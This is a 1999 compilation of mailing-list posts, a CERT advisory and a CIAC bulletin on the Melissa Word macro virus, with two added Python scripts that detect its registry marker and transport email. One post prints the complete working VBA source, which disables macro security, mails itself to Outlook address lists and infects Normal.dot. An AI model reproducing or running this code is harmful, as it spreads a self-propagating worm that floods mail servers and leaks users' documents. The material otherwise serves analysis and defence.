Date: Fri, 26 Mar 1999 17:05:51 -0800
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa Macro Virus

I normally don't allow virus posts through the list as they seldom represent
a new threat, just a new example of an already existing one, but this one
is getting enough play to warrant a message.

There is a new Word macro virus circulating called Melissa. The virus
propagates via email. Attached to the email is a Word file that when
opened will launch a macro that will send the same message to the first
50 recipients of your Outlook address book. The subject line is
"important Message From <some user name>". The body consists of the text
"Here is that document you asked for... don't show anyone else;-)".
The infected document contains passwords to porn web sites.

For more information check out: http://vil.mcafee.com/vil/vm10120.asp

As this thing is emailing itself to everyone under the sun virus vendors
should have no problem obtaining copies to analyze. If anyone wants a copy
send me a message.


--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 18:01:13 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa virus code

Sorry to add one more message to this.  I placed the code up on my site,
formatted so that it is readable.

   http://www.root.org/

-Nate

[http://www.root.org/melissa_virus.txt]

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  CommandBars("Tools").Controls("Macro").Enabled = False
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
  If UngaDasOutlook = "Outlook" Then
    DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
         BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
    DasMapiName.Logoff
  End If
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
  If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
  Set ToInfect = ADI1
  ADI1.Name = "Melissa"
  DoAD = True
End If

If NTI1.Name <> "Melissa" Then
  If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
  Set ToInfect = NTI1
  NTI1.Name = "Melissa"
  DoNT = True
End If
    
If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
  Do While ADI1.CodeModule.Lines(1, 1) = ""
    ADI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
  Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If
  
If DoAD = True Then
  Do While NTI1.CodeModule.Lines(1, 1) = ""
    NTI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
  Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
  ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
  ActiveDocument.Saved = True 
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here."
End Sub

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 17:51:49 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Here is my analysis of how the virus works.  The McAfee article aleph1
posted neglects to mention that it infects the active document and
Normal.dot

1.  Check for Word security controls and disable them:
    Word 2000
        Macro.Security... = FALSE
    Word 97
        Options.ConfirmConversions = 0
        Options.VirusProtection = 0
        Options.SaveNormalPrompt = 0

2.  See if machine is already infected
    Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by
Kwyjibo"

3.  If it wasn't already infected, go through the Outlook addressbook and
send mail to the first 50 names
    Subject: Important Message From <Full Name>
    Body:  Here is that document you asked for... don't show anyone else
;-)
    Attachment:  itself, named "list.doc"

    After sending the mail, add the registry key to disable further
infection.

4.  Open the Active Document and Normal.dot and infect them with itself

5.  On the way out, check if the current day equals the current minute.
If so, print "Twenty-two points, plus triple-word-score, plus fifty points
for using all my letters.  Game's over.  I'm outta here."

It does not appear to do anything malicious other than shutting down your
mail server with tons of mail as users start opening the attachment.  It
appears the virus vendors have a patch out now.  To avoid infection,
disable macros when opening any Word document or just don't open the
attachment.  Thanks to Josh Siegel for sending me the code.

-Nate

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:00:35 -0800
From: "Kuo, Jimmy" <Jimmy_Kuo@NAI.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Nate Lawson does a wonderful writeup to which I will make minor
clarifications:
>Here is my analysis of how the virus works.  The McAfee article aleph1
>posted neglects to mention that it infects the active document and
>Normal.dot

[Hide face]
In all the clamor over the spreading aspect, we forgot to tell people that
it's a normal macro virus in all other means.  And that if you don't have
Outlook, breath calm.  But if you do have Outlook, WATCH OUT!

"infects the active document" is redundant.  It's infected.  That's what
starts this.

>1.  Check for Word security controls and disable them:
>    Word 2000
>        Macro.Security... = FALSE
>    Word 97
>        Options.ConfirmConversions = 0
>        Options.VirusProtection = 0
>        Options.SaveNormalPrompt = 0

>2.  See if machine is already infected
>    Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by
>Kwyjibo"

>3.  If it wasn't already infected, go through the Outlook addressbook and
>send mail to the first 50 names

First 50 names of every addressbook.

And the kicker?  Look at the first 50 names in your address books?  How many
mailing lists are there?

>    Subject: Important Message From <Full Name>
>    Body:  Here is that document you asked for... don't show anyone else
>;-)

>    Attachment:  itself, named "list.doc"

This time.  We have discovered that it was posted to alt.sex in a file named
LIST.ZIP.

>    After sending the mail, add the registry key to disable further
>infection.

Disables future mailings.  Infections can happen again.  But the email blast
will happen only the first time, unless you clean the registry.  So we
recommend that you do not remove that element of the registry.

>4.  Open the Active Document and Normal.dot and infect them with itself

>5.  On the way out, check if the current day equals the current minute.
>If so, print "Twenty-two points, plus triple-word-score, plus fifty points
>for using all my letters.  Game's over.  I'm outta here."

>It does not appear to do anything malicious other than shutting down your
>mail server with tons of mail as users start opening the attachment.  It
>appears the virus vendors have a patch out now.  To avoid infection,
>disable macros when opening any Word document or just don't open the
>attachment.  Thanks to Josh Siegel for sending me the code.

Good ideas.

Jimmy Kuo
Director, AV Research, Network Associates
(or as he says, McAfee)
jkuo@nai.com
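The "Melissa?" marker that Nate's step 2 and Jimmy Kuo's reply discuss (and that the CIAC bulletin later suggests checking with Regedit) can be checked from an exported registry hive without touching the live registry. The following is an added example written for this thread, not code from any poster, vendor or advisory. Per the posted source, the marker is a string value named "Melissa?" under HKEY_CURRENT_USER\Software\Microsoft\Office, and on Word 2000 the macro security Level under ...\Office\9.0\Word\Security is set to 1; the .reg exports below are constructed, and the REGEDIT4 text layout is an assumption about the export format. It only reports, in line with Kuo's advice to leave the marker in place so the mailing run is not repeated.

```python
r"""Host-side check for the Melissa registry indicators discussed in the thread.

Added example, not code from any poster or vendor. It parses a REGEDIT4-style
.reg export (assumed format) and reports two indicators taken from the posted
source: the "Melissa?" marker that means the mailing run already happened, and
the Word 2000 macro security Level lowered to 1. Sample exports are constructed.
"""
from typing import Dict, Optional, Tuple

MARKER_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office"
MARKER_NAME = "Melissa?"
MARKER_VALUE = "... by Kwyjibo"
SECURITY_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
LOWERED_LEVEL = "1"  # the value the posted source writes (1&)


def _unescape(s: str) -> str:
    """Undo .reg escaping: a backslash quotes the character that follows it."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a .reg export into {key: {name: value}}.

    Keys and value names are lower-cased because the registry is
    case-insensitive. Only "name"="string" and "name"=dword:hex lines are kept
    (dwords become decimal strings); other value types are not needed here.
    """
    tree: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            tree.setdefault(current, {})
            continue
        if current is None or not line.startswith('"'):
            continue
        name, sep, value = line[1:].partition('"=')
        if not sep:
            continue
        vname = _unescape(name).lower()
        if len(value) >= 2 and value.startswith('"') and value.endswith('"'):
            tree[current][vname] = _unescape(value[1:-1])
        elif value.startswith("dword:"):
            try:
                tree[current][vname] = str(int(value[6:], 16))
            except ValueError:
                continue
    return tree


def melissa_marker(reg_text: str) -> Tuple[bool, Optional[str]]:
    """Return (marker_set, stored_value); marker_set is True only on an exact match."""
    values = parse_reg_export(reg_text).get(MARKER_KEY.lower(), {})
    value = values.get(MARKER_NAME.lower())
    return value == MARKER_VALUE, value


def word2000_security_lowered(reg_text: str) -> bool:
    """True when Word 2000's macro security Level holds the value the virus writes."""
    values = parse_reg_export(reg_text).get(SECURITY_KEY.lower(), {})
    return values.get("level") == LOWERED_LEVEL


def report(reg_text: str) -> Dict[str, bool]:
    """Summarise both indicators for one exported hive (report only, no changes)."""
    marker_set, _ = melissa_marker(reg_text)
    return {
        "mailed_already": marker_set,
        "word2000_security_lowered": word2000_security_lowered(reg_text),
    }


# Constructed sample exports, not taken from a real machine.
INFECTED_EXPORT = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Office]
"Melissa?"="... by Kwyjibo"

[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]
"Level"="1"
"""

CLEAN_EXPORT = r"""REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Office]
"DefaultPath"="C:\\My Documents"
"""

if __name__ == "__main__":
    print("infected export:", report(INFECTED_EXPORT))
    print("clean export:   ", report(CLEAN_EXPORT))
```

Note that an absent marker does not mean a clean machine: the marker is only written after the mailing run, so a document or Normal.dot can be infected while the value is missing, which is why the thread pairs this check with an up-to-date scanner.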

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:24:47 -0800
From: Aaron Wood <awood@CS.WASHINGTON.EDU>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)


On a lighter side...


MSNBC speculates as to the origin of the Hackers name.

       "Kwyjibo appears to be a reference to a "Simpsons" TV show episode in
which Bart Simpson wins a Scrabble game by spelling out the word Kwyjibo.
The virus also includes a line from that episode: "Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."


AW


-----Original Message-----
From: Dan Schrader [mailto:Dan_Schrader@trendmicro.com]
Sent: Friday, March 26, 1999 6:56 PM
To: 'Aaron Wood'; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: RE: [BugTraq] Melissa Macro Virus (fwd)


This is a serious event.  A number of major companies - including Microsoft
and Intel have told the press that they had to temporarily shut down their
e-mail systems due to this virus.  At least 25 major companies have
contacted Trend Micro about this today alone.

Trend Micro has a free tool for scanning your exchange servers to ensure
that they are not harboring any infected documents.  The tool, called
HouseCall for Microsoft Exchange is available at:

http://housecall.antivirus.com/smex_housecall/

This detects, but does not cure infected files.  HouseCall for Exchange is
an ActiveX Control - so you need Microsoft IE with security settings set to
medium or low to run it.  Considering this audience, I suspect you will want
to remember to set those settings back when you are done.

Trend also offers a tool for scanning individual machines
http://housecall.antivirus.com

Virus Description:

This virus works with both Word 97 and Word 2000 and the macro activates
when an infected document is closed. If it is activated in Word 2000, it
will lower the security setting to the lowest level by modifying the
registry and will disable the Word menu commands (Macro\Security) which
allows the user to reinstate security settings. In Word97, the virus
disables the Tools/Macro menu commands, the Confirm Conversions option, the
MS Word macro virus protection, and the Save Normal Template prompt. The
virus then checks to see if the registry key
"HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?" contains the value ".
. . by Kwyjibo." This is how the virus determines whether it has activated
on this system.

The virus then opens Outlook, if present on the system, and sends one email
for each address list. The email may contain up to 50 recipients. The email
will contain the subject line: "Important Message From {user name}" and the
message body will be "Here is that document you asked for . . . don't show
anyone else :-)" The virus then attaches a copy of the infected active
document to the outgoing mail. The name of the original infected attachment
was List.doc, but it could be any name.

If the user does not have Outlook, the virus will not work. Then the virus
modifies the value of the registry key mentioned above so it is equal to ".
. . by Kwyjibo" -- indicating that it has successfully activated on this
computer. After that, the virus checks to see if the normal template and
active document are infected, and if either is not, it infects the file.
Finally, if the day of the month is equal to the minute (for example, if it
is March 26 at 3:26 pm), the virus will type the following text on the
active document: "Twenty-two points, plus triple-word-score, plus fifty
points for using all my letters. Game's over. I'm outta here."

Trend Micro has detection for this virus in its latest pattern update,
"510". Users are encouraged to download and install this latest pattern
update. The protection will also be included in the regular weekly update.

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 07:07:20 -0500
From: CERT Advisory <cert-advisory@cert.org>
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@coal.cert.org
Subject: CERT Advisory CA-99.04 - Melissa Macro Virus

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-99-04-Melissa-Macro-Virus

   Original issue date: Saturday March 27 1999
   Last Revised: Saturday March 27, 1999

Systems Affected

     * Machines with Microsoft Word 97 or Word 2000
     * Any mail handling system could experience performance problems or
       a denial of service as a result of the propagation of this macro
       virus.

Overview

   At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began
   receiving reports of a Microsoft Word 97 and Word 2000 macro virus
   which is propagating via email attachments. The number and variety of
   reports we have received indicate that this is a widespread attack
   affecting a variety of sites.

   Our analysis of this macro virus indicates that human action (in the
   form of a user opening an infected Word document) is required for this
   virus to propagate. It is possible that under some mailer
   configurations, a user might automatically open an infected document
   received in the form of an email attachment. This macro virus is not
   known to exploit any new vulnerabilities. While the primary transport
   mechanism of this virus is via email, any way of transferring files
   can also propagate the virus.

   Anti-virus software vendors have called this macro virus the Melissa
   macro or W97M_Melissa virus.

I. Description

   The Melissa macro virus propagates in the form of an email message
   containing an infected Word document as an attachment. The transport
   message has most frequently been reported to contain the following
   Subject header

      Subject: Important Message From <name>

   Where <name> is the full name of the user sending the message.

   The body of the message is a multipart MIME message containing two
   sections. The first section of the message (Content-Type: text/plain)
   contains the following text.

      Here is that document you asked for ... don't show anyone else ;-)

   The next section (Content-Type: application/msword) was initially
   reported to be a document called "list.doc". This document contains
   references to pornographic web sites. As this macro virus spreads we
   are likely to see documents with other names. In fact, under certain
   conditions the virus may generate attachments with documents created
   by the victim.

   When a user opens an infected .doc file with Microsoft Word97 or
   Word2000, the macro virus is immediately executed if macros are
   enabled.

   Upon execution, the virus first lowers the macro security settings to
   permit all macros to run when documents are opened in the future.
   Therefore, the user will not be notified when the virus is executed in
   the future.

   The macro then checks to see if the registry key

   "HKEY_Current_User\Software\Microsoft\Office\Melissa?"

   has a value of "... by Kwyjibo". If that registry key does not exist
   or does not have a value of "... by Kwyjibo", the virus proceeds to
   propagate itself by sending an email message in the format described
   above to the first 50 entries in every MAPI address book readable by
   the user executing the macro. Keep in mind that if any of these email
   addresses are mailing lists, the message will be delivered to everyone
   on the mailing lists. In order to successfully propagate, the affected
   machine must have Microsoft Outlook installed; however, Outlook does
   not need to be the mailer used to read the message.

   Next, the macro virus sets the value of the registry key to "... by
   Kwyjibo". Setting this registry key causes the virus to only propagate
   once per session. If the registry key does not persist through
   sessions, the virus will propagate as described above once per every
   session when a user opens an infected document. If the registry key
   persists through sessions, the virus will no longer attempt to
   propagate even if the affected user opens an infected document.

   The macro then infects the Normal.dot template file. By default, all
   Word documents utilize the Normal.dot template; thus, any newly
   created Word document will be infected. Because unpatched versions of
   Word97 may trust macros in templates the virus may execute without
   warning. For more information please see:

       http://www.microsoft.com/security/bulletins/ms99-002.asp

   Finally, if the minute of the hour matches the day of the month at
   this point, the macro inserts into the current document the message
   "Twenty-two points, plus triple-word-score, plus fifty points for
   using all my letters. Game's over. I'm outta here."

   Note that if you open an infected document with macros disabled and
   look at the list of macros in this document, neither Word97 nor
   Word2000 list the macro. The code is actually VBA (Visual Basic for
   Applications) code associated with the "document.open" method. You can
   see the code by going into the Visual Basic editor.

   If you receive one of these messages, keep in mind that the message
   came from someone who is affected by this virus and they are not
   necessarily targeting you. We encourage you to contact any users from
   which you have received such a message. Also, we are interested in
   understanding the scope of this activity; therefore, we would
   appreciate if you would report any instance of this activity to us
   according to our Incident Reporting Guidelines document available at:

       http://www.cert.org/tech_tips/incident_reporting.html

II. Impact

     * Users who open an infected document in Word97 or Word2000 with
       macros enabled will infect the Normal.dot template causing any
       documents referencing this template to be infected with this macro
       virus. If the infected document is opened by another user, the
       document, including the macro virus, will propagate. Note that
       this could cause the user's document to be propagated instead of
       the original document, and thereby leak sensitive information.

     * Indirectly, this virus could cause a denial of service on mail
       servers. Many large sites have reported performance problems with
       their mail servers as a result of the propagation of this virus.

III. Solutions

     * Block messages with the signature of this virus at your mail transfer
       agents.

       With Sendmail

       Nick Christenson of sendmail.com provided information about
       configuring sendmail to filter out messages that may contain the
       Melissa virus. This information is available from the follow URL:
       ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-filter.txt

     * Utilize virus scanners

       Most virus scanning tools will detect and clean macro viruses. In
       order to detect and clean current viruses you must keep your
       scanning tools up to date with the latest definition files.

          + McAfee / Network Associates

            http://vil.mcafee.com/vil/vm10120.asp
            http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp

          + Symantec

            http://www.symantec.com/avcenter/venc/data/mailissa.html

          + Trend Micro

            http://housecall.antivirus.com/smex_housecall/technotes.html

     * Encourage users at your site to disable macros in Microsoft Word

       Notify all of your users of the problem and encourage them to
       disable macros in Word. You may also wish to encourage users to
       disable macros in any product that contains a macro language as
       this sort of problem is not limited to Microsoft Word.

       In Word97 you can disable automatic macro execution (click
       Tools/Options/General then turn on the 'Macro virus protection'
       checkbox). In Word2000 macro execution is controlled by a security
       level variable similar to Internet Explorer (click on
       Tools/Macro/Security and choose High, Medium, or Low). In that
       case, 'High' silently ignores the VBA code, Medium prompts in the
       way Word97 does to let you enable or disable the VBA code, and
       'Low' just runs it.

       Word2000 supports Authenticode on the VB code. In the 'High'
       setting you can specify sites that you trust and code from those
       sites will run.

     * General protection from Word Macro Viruses

       For information about macro viruses in general, we encourage you
       to review the document "Free Macro AntiVirus Techniques" by Chengi
       Jimmy Kuo which is available at:

          http://www.nai.com/services/support/vr/free.asp

Acknowledgements

   We would like to thank Jimmy Kuo of Network Associates, Eric Allman
   and Nick Christenson of sendmail.com, Dan Schrader of Trend Micro, and
   Jason Garms and Karan Khanna of Microsoft for providing information
   used in this advisory.

   Additionally we would like to thank the many sites who reported this
   activity.
   ______________________________________________________________________

   This document is available from:
   http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html.
   ______________________________________________________________________

CERT/CC Contact Information

   Email: cert@cert.org
          Phone: +1 412-268-7090 (24-hour hotline)
          Fax: +1 412-268-6989
          Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.

   CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
   Monday through Friday; they are on call for emergencies during other
   hours, on U.S. holidays, and on weekends.

Using encryption

   We strongly urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from http://www.cert.org/CERT_PGP.key.
   If you prefer to use DES, please call the CERT hotline for more
   information.

Getting security information

   CERT publications and other security information are available from
   our web site http://www.cert.org/.

   To be added to our mailing list for advisories and bulletins, send
   email to cert-advisory-request@cert.org and include SUBSCRIBE
   your-email-address in the subject of your message.

   Copyright 1999 Carnegie Mellon University.
   Conditions for use, disclaimers, and sponsorship information can be
   found in http://www.cert.org/legal_stuff.html.

   * "CERT" and "CERT Coordination Center" are registered in the U.S.
   Patent and Trademark Office
   ______________________________________________________________________

   NO WARRANTY
   Any material furnished by Carnegie Mellon University and the Software
   Engineering Institute is furnished on an "as is" basis. Carnegie
   Mellon University makes no warranties of any kind, either expressed or
   implied as to any matter including, but not limited to, warranty of
   fitness for a particular purpose or merchantability, exclusivity or
   results obtained from use of the material. Carnegie Mellon University
   does not make any warranty of any kind with respect to freedom from
   patent, trademark, or copyright infringement.
   ______________________________________________________________________

Revision History

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNvy9H3VP+x0t4w7BAQG1ggP7B8ItzTRpkP2O8JK7olIOdmn072PIZZxE
mJDW+A9fLDvRZQlVDSsFz/aH8ivmhor5ZbvtT14OmfIZWvxYdFnbO/s2WYL7+fV5
jL6mSb4AJ6lRXIYii+t22V0lvqJdP6VRFqy9EibpMtU2dhgFYf3TKX5e6wajOmBx
bZ6Ef5jPilA=
=aABH
-----END PGP SIGNATURE-----
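The advisory's first solution is to block the transport message at the mail transfer agent, and it links a sendmail filter for that. The following is an added example written for this thread, not the sendmail filter the advisory links to and not any vendor's code: it matches a raw message on the three traits the reports agree on (a Subject beginning "Important Message From", the body line, and an application/msword attachment) and flags it only when all three coincide, so a legitimate "important message" or an ordinary shared .doc is not held. The attachment name is deliberately not used, since the advisory notes it varies. The sample messages are constructed, and the attachment bytes are just an OLE header followed by zeros.

```python
"""Mail-gateway check for the Melissa transport message described in the thread.

Added example, not the advisory's sendmail filter nor any vendor's code. It
matches the Subject prefix, the body line and a Word attachment, and flags a
message only when all three coincide. The messages below are constructed.
"""
from email import message_from_string
from typing import Dict, List

SUBJECT_PREFIX = "important message from "
BODY_MARKER = "here is that document you asked for"


def melissa_traits(raw: str) -> Dict[str, bool]:
    """Report which of the three traits a raw RFC 822 message shows."""
    msg = message_from_string(raw)
    subject = (msg.get("Subject") or "").strip().lower()
    traits = {
        "subject": subject.startswith(SUBJECT_PREFIX),
        "body": False,
        "word_attachment": False,
    }
    for part in msg.walk():  # the multipart container itself matches neither branch
        ctype = part.get_content_type()
        if ctype == "text/plain":
            payload = part.get_payload(decode=True) or b""
            if BODY_MARKER in payload.decode("latin-1", "replace").lower():
                traits["body"] = True
        elif ctype == "application/msword":
            # match on the declared type, not the file name, which the advisory says varies
            traits["word_attachment"] = True
    return traits


def is_melissa_like(raw: str) -> bool:
    """Flag only when subject, body and Word attachment all coincide."""
    t = melissa_traits(raw)
    return t["subject"] and t["body"] and t["word_attachment"]


def triage(messages: List[str]) -> List[int]:
    """Indexes of the messages a gateway would hold for review."""
    return [i for i, m in enumerate(messages) if is_melissa_like(m)]


# Constructed samples. The base64 payload is an OLE header plus zeros, not a real document.
MELISSA_LIKE = """\
From: alice@example.test
To: bob@example.test
Subject: Important Message From Alice Example
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Here is that document you asked for ... don't show anyone else ;-)
--b1
Content-Type: application/msword; name="list.doc"
Content-Disposition: attachment; filename="list.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--b1--
"""

SHARED_DOC = """\
From: carol@example.test
To: bob@example.test
Subject: Q1 figures
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain

Attached are the Q1 figures we discussed.
--b2
Content-Type: application/msword; name="q1.doc"
Content-Disposition: attachment; filename="q1.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--b2--
"""

PLAIN_NOTE = """\
From: hr@example.test
To: bob@example.test
Subject: Important Message From HR

Please review the updated holiday schedule.
"""

if __name__ == "__main__":
    for name, sample in [("melissa-like", MELISSA_LIKE), ("shared doc", SHARED_DOC), ("plain note", PLAIN_NOTE)]:
        print(f"{name}: {melissa_traits(sample)} -> hold={is_melissa_like(sample)}")
```

A gateway rule like this only catches the transport message as reported; the advisory itself warns that other names, and documents created by the victim, will follow, so the content-type match and an up-to-date scanner on the mail store are what carry the weight once the subject line changes.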

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 20:20:13 -0800
From: Jim Reavis <jreavis@SECURITYPORTAL.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

The one thing I would like to add is that the virus code actually walks
through every available address list and grabs 50 recipients off of each for
a separate message, so if your Outlook client is attached to an Exchange
Server, it will hit the Global Address List and other available containers,
where it may find large distribution lists.

I will shortly have my analysis up at http://securityportal.com/

Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 12:45:38 -0800 (PST)
From: CIAC Mail User <ciac@rumpole.llnl.gov>
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-037: W97M.Melissa Word Macro Virus

[  For Public Release  ]
-----BEGIN PGP SIGNED MESSAGE-----


             __________________________________________________________

                       The U.S. Department of Energy
                    Computer Incident Advisory Capability
                           ___  __ __    _     ___
                          /       |     /_\   /
                          \___  __|__  /   \  \___
             __________________________________________________________

                             INFORMATION BULLETIN

                         W97M.Melissa Word Macro Virus

March 27, 1999 17:00 GMT                                        Number J-037
_____________________________________________________________________________
PROBLEM:       A new Word 97 macro virus named W97M.Melissa has been detected 
               at multiple DOE sites and is known to be spreading widely. The 
               virus uses Microsoft Outlook to e-mail the infected document 
               to the first 50 people from each of your Outlook address books.
PLATFORM:      Windows 95 or Windows NT running Microsoft Word 97 (version 8) 
               or Word 2000 (version 9) and Microsoft Outlook. Word 98 on the 
               Macintosh is probably not vulnerable because the virus uses
               the Windows registry, but that has not been verified yet.  
               Outlook Express and other mail readers are not vulnerable. 
DAMAGE:        It overwrites the first macro in open documents and in the 
               normal.dot template with the macro virus code. It turns off 
               macro detection in Word. It sends copies of the infected 
               document to up to 50 people from each of your Outlook address 
               books. 
SOLUTION:      Use an updated antivirus product. Some vendors have a solution 
               available but in many cases you must go to the vendor's web
               site to get it. Do not depend on the automatic or live update 
               feature of an antivirus package to get the detector for this 
               virus. Additional precautions are to password protect the 
               normal.dot file, turn on macro virus detection in Word, and DO 
               NOT OPEN attachments to mail messages with the subject 
               "Important Message From " and the contents "Here is that 
               document you asked for ... don't show anyone else ;-)" without 
               checking with the sender. Alert your computer security
               officers if you receive such messages.
_____________________________________________________________________________
VULNERABILITY  Risk of infection is high. This virus is spreading widely 
ASSESSMENT:    within and outside of the DOE complex. The risk of damage to 
               your system is low because most users do not have macros in  
               files and would be alerted by Word's macro detector. The risk  
               of lost productivity and lost mail messages is high as mail  
               servers may have to be shut down and purged of infected mail 
               messages. 
_____________________________________________________________________________
   CIAC has critical information about the W97M.Melissa Word Macro Virus

The W97M.Melissa Word macro virus has been seen within the DOE complex. This 
macro virus attaches to Word objects in Word 97 and Word 2000. Because of
this method of infection, this virus will not infect older versions of  
Microsoft Word. When an infected document is opened, the virus checks to  
see if Word 97 or Word 2000 is installed and then disables the Macro
toolbar.   
It then disables the following Word options:

  Confirm conversions at open.
  Macro virus protection.
  Prompt to save Normal template.

Disabling these options makes it difficult to detect the virus in action. The 
virus next checks the value of the private registry string:

  HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa? 

If that string is not equal to "... by Kwyjibo" the virus sends copies of the 
infected document to the first 50 people in each of your Outlook address 
books and then sets the registry key so it does not do this again. It sends 
copies of the infected document to others by opening a connection to Microsoft
Outlook and creating an e-mail message with the subject:

  Important Message From <username>

where <username> is replaced with the current Word user's name (Tools, Options
command, User Information tab). The body of the message contains the following
text: 

  Here is that document you asked for ... don't show anyone else ;-)

The virus then inserts the first 50 users from your Outlook address book, 
attaches the infected document and sends the message. It does this for however
many address books you have defined in Outlook.

After sending itself to the people in your address books, the virus then
checks to see if it is running on a document or the Normal.dot template. If  
it is running on a document, it infects the Normal.dot template with a
Document_Close macro that runs whenever a document is closed. If it is  
running on the Normal.dot template, it infects the active document with a 
